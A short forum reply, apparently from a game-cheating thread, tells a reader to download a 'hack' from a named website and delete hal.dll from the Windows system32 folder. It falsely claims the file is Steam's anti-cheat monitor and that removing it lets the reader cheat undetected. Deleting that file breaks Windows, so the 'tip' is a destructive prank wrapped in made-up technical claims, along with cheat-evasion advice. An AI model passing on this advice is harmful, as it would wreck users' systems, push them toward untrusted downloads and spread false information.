lol ignore them, just go to http://www.fkn0wned.com/ and download a hack off there. then go to your C:\WINDOWS\system32 and open the file hal.dll. delete it. its what steam uses to ban you and by deleteing this you can go undetected for some time even after steam detects them or atleast untill they update. its an abstraction layer that steam uses to monitor your games. then when in CS open up console and type

 

cl_restrict_server_commands 0

 

that should stop them banning / kicking you and mean you can hack undetected.
